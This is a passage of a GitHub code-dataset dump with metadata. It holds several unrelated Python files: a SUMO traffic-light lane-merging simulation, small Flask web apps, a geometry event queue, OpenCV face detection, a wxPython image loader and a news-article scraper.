traci.lanearea.getLastStepVehicleNumber(\"dC\") > 0:\n gA = False # Whether to set the traffic light to green for lane A\n gBX = False # Whether to set the traffic light to green for lane B to lane X\n gBY = False # Whether to set the traffic light to green for lane B to lane Y\n gC = False # Whether to set the traffic light to green for lane C\n ''' Control outgoing lane X '''\n if len(schedule_A) > 0 and len(schedule_BX) > 0:\n # Let the vehicle on lane A go first\n if schedule_A[0].time < schedule_BX[0].time:\n if leaveA: # If a vehicle on lane A left at last step\n countdownX = W_same # Wait for W=\n elif leaveBX: # If a vehicle on lane B left at last step\n countdownX = W_diff # Wait for W+\n elif not countdownX: # If there is no need to wait or the waiting time is over\n gA = True # We can set the traffic light to green\n else: # Let the vehicle on lane B go first\n if leaveBX:\n countdownX = W_same\n elif leaveA:\n countdownX = W_diff\n elif not countdownX:\n gBX = True\n elif len(schedule_A) > 0:\n if leaveA:\n countdownX = W_same\n elif leaveBX:\n countdownX = W_diff\n elif not countdownX:\n gA = True\n elif len(schedule_BX) > 0:\n if leaveBX:\n countdownX = W_same\n elif leaveA:\n countdownX = W_diff\n elif not countdownX:\n gBX = True\n elif not countdownX:\n gA = True\n gBX = True\n\n ''' Control outgoing lane Y '''\n if len(schedule_C) > 0 and len(schedule_BY) > 0:\n if schedule_C[0].time < schedule_BY[0].time:\n if leaveC:\n countdownY = W_same\n elif leaveBY:\n countdownY = W_diff\n elif not countdownY:\n gC = True\n else:\n if leaveBY:\n countdownY = W_same\n elif leaveC:\n countdownY = W_diff\n elif not countdownY:\n gBY = True\n elif len(schedule_C) > 0:\n if leaveC:\n countdownY = W_same\n elif leaveBY:\n countdownY = W_diff\n elif not countdownY:\n gC = True\n elif len(schedule_BY) > 0:\n if leaveBY:\n countdownY = W_same\n elif leaveC:\n countdownY = W_diff\n elif not countdownY:\n gBY = True\n elif not countdownY:\n gC = True\n gBY = True\n\n # Set the traffic lights according to the boolean variables\n if gA and gBX and gBY and gC:\n traci.trafficlight.setPhase(\"TL1\", 0)\n elif gA and gBY:\n traci.trafficlight.setPhase(\"TL1\", 2)\n elif gA and gC:\n traci.trafficlight.setPhase(\"TL1\", 4)\n elif gBX and gC:\n traci.trafficlight.setPhase(\"TL1\", 6)\n elif gBX and gBY:\n traci.trafficlight.setPhase(\"TL1\", 20)\n elif gA:\n traci.trafficlight.setPhase(\"TL1\", 8)\n elif gBX:\n traci.trafficlight.setPhase(\"TL1\", 10)\n elif gBY:\n traci.trafficlight.setPhase(\"TL1\", 12)\n elif gC:\n traci.trafficlight.setPhase(\"TL1\", 14)\n else:\n traci.trafficlight.setPhase(\"TL1\", 1)\n # Subtract the waiting time\n if countdownX:\n countdownX -= 1\n if countdownY:\n countdownY -= 1\n\n # The last passing time\n if passTime_dX >= passTime_dY:\n print(passTime_dX)\n else:\n print(passTime_dY)\n\n traci.close()\n sys.stdout.flush()\n\n\ndef get_options():\n optParser = optparse.OptionParser()\n optParser.add_option(\"--nogui\", action=\"store_true\",\n default=False, help=\"run the commandline version of sumo\")\n options, args = optParser.parse_args()\n return options\n\n\ndef main():\n options = get_options()\n # this script has been called from the command line. It will start sumo as a\n # server, then connect and run\n if options.nogui:\n sumoBinary = checkBinary('sumo')\n else:\n sumoBinary = checkBinary('sumo-gui')\n\n # Randomly generate the traffics\n generate_routefile(timeStep, N, pA, pB, pC)\n\n # this is the normal way of using traci. sumo is started as a\n # subprocess and then the python script connects and runs\n traci.start([sumoBinary, \"-c\", \"sumo_data/laneMerging.sumocfg\",\n \"--tripinfo-output\", \"sumo_data/tripinfo_dp.xml\",\n \"-S\",\n \"--no-step-log\", \"true\", \"-W\", \"--duration-log.disable\", \"true\"])\n\n run(alpha, beta, gamma, W_same, W_diff)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "JCP1014/Lane-Merging", "sub_path": "SUMO/example/runner_python.py", "file_name": "runner_python.py", "file_ext": "py", "file_size_in_byte": 18466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 22, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 49, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 53, "usage_type": "call"}, {"api_name": "traci.simulation.getTime", "line_number": 64, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 64, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleIDs", "line_number": 67, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 67, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getDistance", "line_number": 68, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 68, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getSpeed", "line_number": 69, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 69, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getAcceleration", "line_number": 70, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 70, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleIDs", "line_number": 91, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 91, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getDistance", "line_number": 92, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 92, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getSpeed", "line_number": 93, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 93, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getAcceleration", "line_number": 94, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 94, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleIDs", "line_number": 130, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 130, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getDistance", "line_number": 131, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 131, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getSpeed", "line_number": 132, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 132, "usage_type": "attribute"}, {"api_name": "traci.vehicle.getAcceleration", "line_number": 133, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 133, "usage_type": "attribute"}, {"api_name": "traci.simulation.getMinExpectedNumber", "line_number": 185, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 185, "usage_type": "attribute"}, {"api_name": "traci.simulation.getLoadedIDList", "line_number": 187, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 187, "usage_type": "attribute"}, {"api_name": "traci.vehicle.setLaneChangeMode", "line_number": 188, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 188, "usage_type": "attribute"}, {"api_name": "traci.simulationStep", "line_number": 190, "usage_type": "call"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 193, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 193, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleNumber", "line_number": 203, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 203, "usage_type": "attribute"}, {"api_name": "traci.vehicle.setRouteID", "line_number": 215, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 215, "usage_type": "attribute"}, {"api_name": "traci.vehicle.setRouteID", "line_number": 223, "usage_type": "call"}, {"api_name": "traci.vehicle", "line_number": 223, "usage_type": "attribute"}, {"api_name": "traci.edge.getLastStepVehicleIDs", "line_number": 232, "usage_type": "call"}, {"api_name": "traci.edge", "line_number": 232, "usage_type": "attribute"}, {"api_name": "traci.edge.getLastStepVehicleIDs", "line_number": 233, "usage_type": "call"}, {"api_name": "traci.edge", "line_number": 233, "usage_type": "attribute"}, {"api_name": "traci.edge.getLastStepVehicleIDs", "line_number": 234, "usage_type": "call"}, {"api_name": "traci.edge", "line_number": 234, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 242, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 242, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 253, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 253, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 265, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 265, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 273, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 273, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 284, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 284, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 292, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 292, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 299, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 299, "usage_type": "attribute"}, {"api_name": "traci.simulation.getTime", "line_number": 309, "usage_type": "call"}, {"api_name": "traci.simulation", "line_number": 309, "usage_type": "attribute"}, {"api_name": "traci.lanearea.getLastStepVehicleNumber", "line_number": 319, "usage_type": "call"}, {"api_name": "traci.lanearea", "line_number": 319, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 395, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 395, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 397, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 397, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 399, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 399, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 401, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 401, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 403, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 403, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 405, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 405, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 407, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 407, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 409, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 409, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 411, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 411, "usage_type": "attribute"}, {"api_name": "traci.trafficlight.setPhase", "line_number": 413, "usage_type": "call"}, {"api_name": "traci.trafficlight", "line_number": 413, "usage_type": "attribute"}, {"api_name": "traci.close", "line_number": 426, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 427, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 427, "usage_type": "attribute"}, {"api_name": "optparse.OptionParser", "line_number": 431, "usage_type": "call"}, {"api_name": "sumolib.checkBinary", "line_number": 443, "usage_type": "call"}, {"api_name": "sumolib.checkBinary", "line_number": 445, "usage_type": "call"}, {"api_name": "traci.start", "line_number": 452, "usage_type": "call"}]}
+{"seq_id": "33686997099", "text": "from flask import Flask, request, Markup, render_template, flash, Markup\nimport os\nimport json \n\napp = Flask(__name__)\n\n@app.route('/')\ndef render_about():\n return render_template('about.html')\n\n@app.route('/databycountry')\ndef render_databycountry():\n return render_template('databycountry.html', options = get_country_options())\n \n@app.route('/data')\ndef render_data():\n country = request.args['country']\n return render_template('databycountrydisplay.html', options = get_country_options(), countryFact = fact_by_country(country))\n \n\ndef get_country_options():\n listOfCountries = []\n with open('aids.json') as demographics_data:\n years = json.load(demographics_data)\n for year in years:\n if not(year[\"Country\"] in listOfCountries):\n listOfCountries.append(year[\"Country\"])\n options = \"\"\n for c in listOfCountries:\n options = options + Markup(\"\" + c + \" \")\n return options \n\n\n\ndef fact_by_country(country):\n with open('aids.json') as demographics_data:\n years = json.load(demographics_data)\n highest = 0\n lowest = 15000\n \n highYear= 1990\n lowYear= 2015\n \n for x in years:\n if x[\"Country\"] == country:\n totaldeaths = x[\"Data\"][\"AIDS-Related Deaths\"][\"All Ages\"] \n if totaldeaths > highest:\n highest = totaldeaths\n highYear = x[\"Year\"]\n elif totaldeaths == 0:\n \t lowest = lowest\n if totaldeaths < lowest:\n lowest = totaldeaths\n lowYear = x[\"Year\"]\n highest = round(highest, 2)\n lowest = round(lowest, 2)\n\n return \"The year with the highest deaths in \" + country + \" is \" + str(highYear) + \" (\" + str(highest) + \")\" + \" and the year with the lowest deaths in \" + country + \" is \" + str(lowYear) + \" (\" + str(lowest) + \")\"\n\n\n\n\nif __name__==\"__main__\":\n app.run(debug=True)\n", "repo_name": "Lesly805/CORGIS-AIDS-DATA", "sub_path": "webapp.py", "file_name": "webapp.py", "file_ext": "py", "file_size_in_byte": 1950, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.Markup", "line_number": 30, "usage_type": "call"}, {"api_name": "json.load", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "6727526583", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nimport json\nimport copy\nfrom .compat import PY3, unicode_ as u_\n\n\nif PY3:\n unicode_type = str\n basestring_type = str\nelse:\n # The names unicode and basestring don't exist in py3 so silence flake8.\n unicode_type = unicode # noqa\n basestring_type = basestring # noqa\n\nHTTP_METHODS = ['GET', 'POST', 'PUT', 'DELETE', 'HEAD', 'OPTIONS', 'CONNECT', 'TRACE']\n\n\n_TO_UNICODE_TYPES = (unicode_type, type(None))\n\n\ndef to_unicode(value):\n \"\"\"Converts a string argument to a unicode string.\n\n If the argument is already a unicode string or None, it is returned\n unchanged. Otherwise it must be a byte string and is decoded as utf8.\n \"\"\"\n if isinstance(value, _TO_UNICODE_TYPES):\n return value\n if not isinstance(value, bytes):\n raise TypeError(\n \"Expected bytes, unicode, or None; got %r\" % type(value)\n )\n return value.decode(\"utf-8\")\n\n\ndef _copy_dict(x, memo):\n y = {}\n memo[id(x)] = y\n for key, value in x.items():\n y[key] = unicode_copy(value, memo)\n return y\n\n\ndef _copy_list(x, memo):\n y = []\n memo[id(x)] = y\n for a in x:\n y.append(unicode_copy(a, memo))\n return y\n\n\ndef unicode_copy(x, memo=None, _nil=[]):\n if memo is None:\n memo = {}\n\n d = id(x)\n y = memo.get(d, _nil)\n if y is not _nil:\n return y\n\n if isinstance(x, dict):\n y = _copy_dict(x, memo)\n elif isinstance(x, list):\n y = _copy_list(x, memo)\n elif isinstance(x, str):\n y = to_unicode(x)\n else:\n y = x\n\n memo[d] = y\n copy._keep_alive(x, memo) # Make sure x lives at least as long as d\n return y\n\n\ndef json_decode(value):\n \"\"\"Returns Python objects for the given JSON string.\"\"\"\n return json.loads(value)\n\n\ndef is_empty_string(v):\n if v == '' or v == u_(''):\n return True\n return False\n", "repo_name": "reorx/params", "sub_path": "params/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "compat.PY3", "line_number": 10, "usage_type": "name"}, {"api_name": "copy._keep_alive", "line_number": 74, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 80, "usage_type": "call"}, {"api_name": "compat.unicode_", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "42981832115", "text": "from functools import cmp_to_key\nfrom Point import Point\n\nclass EventQueue:\n def __init__(self, segments, sweep_line, debug):\n self.sweep_line = sweep_line\n self.points = []\n if debug == None:\n debug = False\n self.debug = debug\n for seg in segments:\n if seg.start.compare(seg.end) > 0:\n temp = seg.start\n seg.start = seg.end\n seg.start.is_start = True\n seg.start.is_end = False\n seg.end = temp\n seg.end.is_start = False\n seg.end.is_end = True\n # print(\"reverted:\" + seg.start.print() + \"; \" + seg.end.print())\n self.points.append(seg.start)\n self.points.append(seg.end)\n if self.debug:\n print(\"In:\" + seg.start.print() + \"; \" + seg.end.print())\n self.points.sort(key=cmp_to_key(Point.compare))\n if self.debug:\n print(\"Points: \\n\", '\\n '.join(\"%s\" % (item.print()) for item in self.points))\n\n def has_intersections(self):\n if len(self.points) < 2:\n return False\n for point in self.points:\n intersects = self.sweep_line.move(point)\n if self.debug:\n print(point.print(), \" has intersections:\", intersects)\n if intersects:\n return True\n return False\n\n", "repo_name": "cyberskeleton/simple-polygon-recognition-shamos-hoey", "sub_path": "EventQueue.py", "file_name": "EventQueue.py", "file_ext": "py", "file_size_in_byte": 1398, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "functools.cmp_to_key", "line_number": 25, "usage_type": "call"}, {"api_name": "Point.Point.compare", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Point.Point", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "31462846007", "text": "# https://cooluks.tistory.com/187\r\n# https://github.com/opencv/opencv/tree/master/data/haarcascades\r\n# 얼굴 영역 검출 및 영역 표시하기\r\n\r\nfrom PIL import Image\r\nimport cv2\r\n\r\nimport cv2\r\nimport sys\r\n \r\ncascade_file = \"haarcascade_frontalface_default.xml\"\r\ncascade = cv2.CascadeClassifier(cv2.data.haarcascades + cascade_file)\r\n \r\nimage_file = \"20220805_133250.jpg\" # ./data/face2.jpg\r\nimage = cv2.imread(image_file)\r\nimage_gs = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n \r\nface_list = cascade.detectMultiScale(image_gs, scaleFactor=1.1,\r\n minNeighbors=1, minSize=(150, 150))\r\nif len(face_list) > 0:\r\n print(face_list)\r\n color = (0, 0, 255)\r\n for face in face_list:\r\n x, y, w, h = face\r\n cv2.rectangle(image, (x, y), (x+w, y+h), color, thickness=8)\r\n cv2.imwrite(\"facedetect-output.PNG\", image)\r\nelse:\r\n print(\"no face\")\r\n\r\n# cv_im = cv2.imread('gani.jpg', 0)\r\n# print(\"img.shape = {0}\".format(cv_im.shape))\r\n\r\n# cv2.imshow('cv_im', cv_im)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()", "repo_name": "GongAnts/GongAnts_Untact_Study_Room", "sub_path": "ml/v0.1_220627_detection_output.py", "file_name": "v0.1_220627_detection_output.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.data", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "24754419016", "text": "import image_tweaker\nimport cv2, eel, wx, os, shutil\n\nimages_count = 0\n\ntweaker = image_tweaker.ImageTweaker() # defining an object of ImageTweaker() class\nfile_name = str() # will be treated as global variable to have the chosen image name saved.\nfile_original_path = str() # will be treated as global variable to have the image original path saved.\nto_redo_list = list() # list for popped images of tweaker.image_states when undo\n\n\ndef get_second_image(wildcard=\"*\"):\n \"\"\"Displaying Dialog for user to select image\"\"\"\n app = wx.App(None)\n style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\n dialog = wx.FileDialog(None, 'Open', wildcard=wildcard, style=style) # configuring how dialog displays and looks\n if dialog.ShowModal() == wx.ID_OK: # displaying the dialog when user clicks\n global file_original_path # considering file_original_path variable here as global\n file_original_path = dialog.GetPath() # saving the selected file path\n global file_name # considering file_original variable here as global\n file_name = dialog.GetFilename() # saving the name of the selected file\n shutil.copyfile(file_original_path, f\"{os.path.dirname(os.path.realpath(__file__))}/web/images/{file_name}\")\n # copying the file from its path, to project_directory_path/web/images/directory\n image_path = f\"web/images/{file_name}\" # saving image_path especially to this current python file 'image_launcher'\n tweaker.set_image_conf(image_path) # setting ImageTweaker configurations\n return image_path # returning file_name to javascript as to be the path to look for the images using html img tag\n else:\n return None\n dialog.Destroy() # finally, close the dialog\n\n", "repo_name": "py-sponser/Desktop-App-Projects", "sub_path": "Image Processing Toolbox/double_image_launcher.py", "file_name": "double_image_launcher.py", "file_ext": "py", "file_size_in_byte": 1741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "image_tweaker.ImageTweaker", "line_number": 6, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 14, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.FD_FILE_MUST_EXIST", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 16, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 17, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "6453617331", "text": "\"\"\"Initialise Flask application.\"\"\"\nimport html\nimport os\nimport re\n\nimport flask_reverse_proxy\nfrom flask import Flask, g, request, url_for\nfrom flask_babel import Babel\nfrom flask_compress import Compress\nfrom pylibmc import Client, ClientPool\n\n\ndef create_app():\n \"\"\"Instanciate app.\"\"\"\n app = Flask(__name__)\n\n if os.path.exists(app.config.root_path + '/config.cfg') is False:\n print(\"copy config.default.cfg to config.cfg and add your settings\")\n app.config.from_pyfile(app.config.root_path + '/config.default.cfg')\n else:\n app.config.from_pyfile(app.config.root_path + '/config.cfg')\n\n babel = Babel(app)\n Compress(app)\n\n @babel.localeselector\n def get_locale():\n \"\"\"Get correct language from url.\"\"\"\n locale = request.path[1:].split('/', 1)[0]\n if locale in ['sv', 'en']:\n return locale\n else:\n locale = 'sv'\n for lang in list(request.accept_languages.values()):\n if lang[:2] in ['sv', 'en']:\n locale = lang[:2]\n break\n\n g.locale = locale\n return locale\n\n client = Client(app.config['MEMCACHED'])\n\n @app.before_request\n def func():\n g.babel = Babel\n g.language = get_locale()\n g.config = app.config\n g.mc_pool = ClientPool(client, app.config['POOL_SIZE'])\n\n @app.context_processor\n def inject_custom():\n d = {'lurl_for': lambda ep,\n **kwargs: url_for(ep + '_' + g.language, **kwargs)}\n return d\n\n @app.template_filter('deescape')\n def deescape_filter(s):\n return html.unescape(s)\n\n @app.template_filter('cclink')\n def cclink_filter(s):\n return re.sub(r'(CC-BY\\S*)', '\\\\1 ', s)\n\n from . import helpers\n\n app.jinja_env.globals.update(get_life_range=helpers.get_life_range)\n app.jinja_env.globals.update(make_namelist=helpers.make_namelist)\n app.jinja_env.globals.update(make_datelist=helpers.make_datelist)\n app.jinja_env.globals.update(make_simplenamelist=helpers.make_simplenamelist)\n app.jinja_env.globals.update(make_placelist=helpers.make_placelist)\n app.jinja_env.globals.update(make_placenames=helpers.make_placenames)\n app.jinja_env.globals.update(\n make_alphabetical_bucket=helpers.make_alphabetical_bucket)\n app.jinja_env.globals.update(get_date=helpers.get_date)\n app.jinja_env.globals.update(join_name=helpers.join_name)\n app.jinja_env.globals.update(swedish_translator=helpers.swedish_translator)\n app.jinja_env.globals.update(sorted=sorted)\n app.jinja_env.globals.update(len=len)\n app.jinja_env.globals.update(get_lang_text=helpers.get_lang_text)\n app.jinja_env.globals.update(get_shorttext=helpers.get_shorttext)\n app.jinja_env.globals.update(get_org_name=helpers.get_org_name)\n app.jinja_env.globals.update(rewrite_von=helpers.rewrite_von)\n app.jinja_env.globals.update(lowersorted=helpers.lowersorted)\n app.jinja_env.globals.update(get_current_date=helpers.get_current_date)\n app.jinja_env.globals.update(karp_fe_url=helpers.karp_fe_url)\n\n from . import views\n app.register_blueprint(views.bp)\n app.register_error_handler(Exception, views.page_not_found)\n\n app.wsgi_app = flask_reverse_proxy.ReverseProxied(app.wsgi_app)\n return app\n\n\n# if __name__ == '__main__':\n# if sys.version_info.major < 3:\n# reload(sys)\n# sys.setdefaultencoding('utf8')\n# app.run()\n", "repo_name": "spraakbanken/skbl-portal", "sub_path": "skbl/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 3523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask_babel.Babel", "line_number": 23, "usage_type": "call"}, {"api_name": "flask_compress.Compress", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.accept_languages.values", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.accept_languages", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.g.locale", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 39, "usage_type": "name"}, {"api_name": "pylibmc.Client", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.g.babel", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 46, "usage_type": "name"}, {"api_name": "flask_babel.Babel", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.g.language", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.g.config", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.g.mc_pool", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 49, "usage_type": "name"}, {"api_name": "pylibmc.ClientPool", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.g.language", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 54, "usage_type": "name"}, {"api_name": "html.unescape", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "flask_reverse_proxy.ReverseProxied", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "19852370144", "text": "# web scrapper along with meta data generation in data.json file\n\nfrom newsplease import NewsPlease\nimport bs4\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport json\n\n\n\ndef main():\n articles = []\n arti = []\n data = []\n \n #fetching articles url\n my_url = 'https://www.elpais.com.co/'\n open_url = urlopen(my_url)\n\n html = open_url.read()\n open_url.close()\n\n page_soup = BeautifulSoup(html,\"html.parser\")\n\n titles = page_soup.findAll(\"h2\",{\"class\":\"title\"})\n paid_title = page_soup.find(\"div\",{\"class\":\"container-full zd\"})\n paid_url = paid_title.findAll(\"h2\",{\"class\":\"title\"})\n\n for y in paid_url:\n if(y.a['href'].startswith('https://')):\n arti.append(y.a['href'])\n else:\n arti.append(\"https://www.elpais.com.co\" + y.a['href'])\n\n for x in titles:\n if(x.find(\"a\",{\"class\":\"page-link\"})):\n url = x.a['href']\n if(url.startswith('https://')):\n articles.append(url)\n else:\n articles.append(\"https://www.elpais.com.co\" + url)\n\n for p in arti:\n articles.remove(p)\n\n #creating meta data and storing it in data.json\n for post in articles:\n article = NewsPlease.from_url(post)\n data_json = {\n \"URL\": article.url,\n \"Domain\": article.source_domain,\n \"title\": article.title,\n \"author\": str(article.authors),\n \"text\": str(article.text),\n \"date_published\": str(article.date_publish)\n }\n data.append(data_json)\n \n with open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n \n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "saurabhkumar2015/large-scale-spanish-news-nlp", "sub_path": "Crawler/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1708, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "urllib.request.urlopen", "line_number": 18, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 23, "usage_type": "call"}, {"api_name": "newsplease.NewsPlease.from_url", "line_number": 48, "usage_type": "call"}, {"api_name": "newsplease.NewsPlease", "line_number": 48, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 60, "usage_type": "call"}]}
